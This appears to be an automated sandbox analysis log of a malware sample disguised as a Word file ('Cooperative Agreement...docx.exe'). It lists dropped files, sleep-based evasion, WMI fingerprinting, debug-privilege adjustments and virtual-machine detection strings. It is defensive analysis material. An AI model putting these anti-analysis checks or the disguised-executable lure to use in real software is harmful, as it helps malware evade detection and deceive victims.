Source: C:\Users\user\AppData\Local\Temp\chost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\_queue.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\python312.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-datetime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\rar.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\_bz2.pyd	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\4z11l1tq\4z11l1tq.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-file-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-console-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\chost.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_16-17401

Source: C:\Users\user\AppData\Local\Temp\chost.exe

API coverage: 6.5 %

Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe TID: 6788	Thread sleep count: 2977 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe TID: 6788	Thread sleep time: -74425s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5744	Thread sleep count: 2933 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5800	Thread sleep count: 6900 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5804	Thread sleep time: -19369081277395017s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5264	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3844	Thread sleep count: 4253 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2256	Thread sleep count: 5531 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3732	Thread sleep time: -17524406870024063s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6836	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6432	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7480	Thread sleep count: 4617 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7608	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7480	Thread sleep count: 116 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7552	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7580	Thread sleep count: 4611 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7616	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7584	Thread sleep count: 255 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7600	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2176	Thread sleep count: 7675 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3176	Thread sleep count: 1873 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2436	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8136	Thread sleep count: 570 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8176	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4208	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7372	Thread sleep time: -18446744073709540s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1284	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2304	Thread sleep count: 3277 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7276	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2304	Thread sleep count: 294 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2436	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5552	Thread sleep count: 2533 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5164	Thread sleep count: 841 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2332	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3992	Thread sleep time: -1844674407370954s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Windows\System32\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe

Thread sleep count: Count: 2977 delay: -25

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 16_2_00007FF6943692F0 FindFirstFileExW,FindClose,	16_2_00007FF6943692F0
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 16_2_00007FF6943683B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	16_2_00007FF6943683B0
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 16_2_00007FF6943818E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	16_2_00007FF6943818E4
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FF6943692F0 FindFirstFileExW,FindClose,	17_2_00007FF6943692F0
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FF6943818E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	17_2_00007FF6943818E4
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FF6943683B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	17_2_00007FF6943683B0

Source: C:\Users\user\AppData\Local\Temp\chost.exe

Code function: 17_2_00007FFDF70611E0 GetSystemInfo,

17_2_00007FFDF70611E0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	File opened: C:\Users\user\AppData\Local\Temp\4713.tmp	Jump to behavior
Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	File opened: C:\Users\user\AppData\Local\Temp\4713.tmp\4714.tmp	Jump to behavior
Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	File opened: C:\Users\user\AppData\Local\Temp\4713.tmp\4714.tmp\4715.tmp	Jump to behavior
Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	File opened: C:\Users\user\	Jump to behavior

Source: getmac.exe, 00000058.00000003.2224364583.000001B3DC52C000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000058.00000003.2224570478.000001B3DC53F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000058.00000002.2226197181.000001B3DC540000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V
Source: chost.exe, 00000011.00000003.2048510879.0000016E1725D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vboxservice
Source: chost.exe, 00000011.00000002.2376637980.0000016E18498000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmusrvcp
Source: chost.exe, 00000011.00000003.2048510879.0000016E1725D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmwareuser
Source: chost.exe, 00000011.00000002.2373027155.0000016E173B0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: d00qemu-ga
Source: getmac.exe, 00000058.00000003.2224062995.000001B3DC576000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000058.00000003.2223926320.000001B3DC571000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000058.00000003.2224364583.000001B3DC52C000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000058.00000002.2226539281.000001B3DC579000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000058.00000003.2224570478.000001B3DC53F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
Source: svchost.exe, 0000000C.00000002.2917086111.000002665225B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2913134813.000002664CC2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2916943908.0000026652243000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000058.00000003.2224364583.000001B3DC52C000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000058.00000003.2224570478.000001B3DC53F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000058.00000002.2226197181.000001B3DC540000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: chost.exe, 00000011.00000003.2048510879.0000016E1725D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmsrvc
Source: chost.exe, 00000011.00000002.2373027155.0000016E173B0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: \|$fytesvmsrvc
Source: chost.exe, 00000011.00000003.2048510879.0000016E1725D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmwaretray
Source: chost.exe, 00000011.00000003.2216947461.0000016E177B2000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2224958579.0000016E1772C000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2213105581.0000016E177B2000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2214937861.0000016E17889000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2210509318.0000016E1772C000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2224232061.0000016E176DD000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2207707806.0000016E177B2000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2210509318.0000016E176DD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: chost.exe, 00000011.00000002.2373027155.0000016E173B0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: f4vmusrvc
Source: getmac.exe, 00000058.00000003.2224062995.000001B3DC576000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000058.00000003.2223926320.000001B3DC571000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000058.00000002.2226539281.000001B3DC579000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport6
Source: chost.exe, 00000011.00000002.2373027155.0000016E173B0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: foadsvmware
Source: chost.exe, 00000011.00000003.2047634616.0000016E172E5000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2048319230.0000016E1725C000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2373027155.0000016E173B0000.00000004.00001000.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2048510879.0000016E1725D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vboxtray
Source: chost.exe, 00000011.00000003.2047634616.0000016E172E5000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2048319230.0000016E1725C000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2373027155.0000016E173B0000.00000004.00001000.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2376637980.0000016E18498000.00000004.00001000.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2048510879.0000016E1725D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: qemu-ga
Source: chost.exe, 00000011.00000002.2373027155.0000016E173B0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmware
Source: chost.exe, 00000011.00000003.2049104648.0000016E1798C000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2373846136.0000016E17961000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWr
Source: chost.exe, 00000011.00000003.2048510879.0000016E1725D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmwareservicer_
Source: getmac.exe, 00000058.00000003.2224364583.000001B3DC52C000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000058.00000003.2224570478.000001B3DC53F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000058.00000002.2226197181.000001B3DC540000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAW
Source: getmac.exe, 00000058.00000003.2224364583.000001B3DC52C000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000058.00000003.2224570478.000001B3DC53F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000058.00000002.2226197181.000001B3DC540000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ssubkeyname"system\currentcontrolset\services\hyper-v\linkage"Progr
Source: getmac.exe, 00000058.00000002.2226197181.000001B3DC530000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000058.00000003.2224364583.000001B3DC52C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\Linkageroute
Source: chost.exe, 00000011.00000003.2047634616.0000016E172E5000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2048319230.0000016E1725C000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2373027155.0000016E173B0000.00000004.00001000.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2376637980.0000016E18498000.00000004.00001000.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2048510879.0000016E1725D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmusrvc
Source: getmac.exe, 00000058.00000003.2224062995.000001B3DC576000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000058.00000002.2226197181.000001B3DC530000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000058.00000003.2223926320.000001B3DC571000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000058.00000003.2224364583.000001B3DC52C000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000058.00000002.2226539281.000001B3DC579000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
Source: chost.exe, 00000011.00000003.2048510879.0000016E1725D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmtoolsd
Source: chost.exe, 00000011.00000002.2373027155.0000016E173B0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwareservice

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\chost.exe

Code function: 16_2_00007FF69437A684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

16_2_00007FF69437A684

Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe

Code function: 0_2_0040A756 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,

0_2_0040A756

Source: C:\Users\user\AppData\Local\Temp\chost.exe

Code function: 16_2_00007FF6943834F0 GetProcessHeap,

16_2_00007FF6943834F0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	Code function: 0_2_00409950 SetUnhandledExceptionFilter,	0_2_00409950
Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	Code function: 0_2_00409930 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,	0_2_00409930
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 16_2_00007FF69437A684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_00007FF69437A684
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 16_2_00007FF69436C910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	16_2_00007FF69436C910
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 16_2_00007FF69436D19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_00007FF69436D19C
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 16_2_00007FF69436D37C SetUnhandledExceptionFilter,	16_2_00007FF69436D37C
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FF69437A684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	17_2_00007FF69437A684
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FF69436C910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	17_2_00007FF69436C910
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FF69436D19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	17_2_00007FF69436D19C
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FF69436D37C SetUnhandledExceptionFilter,	17_2_00007FF69436D37C
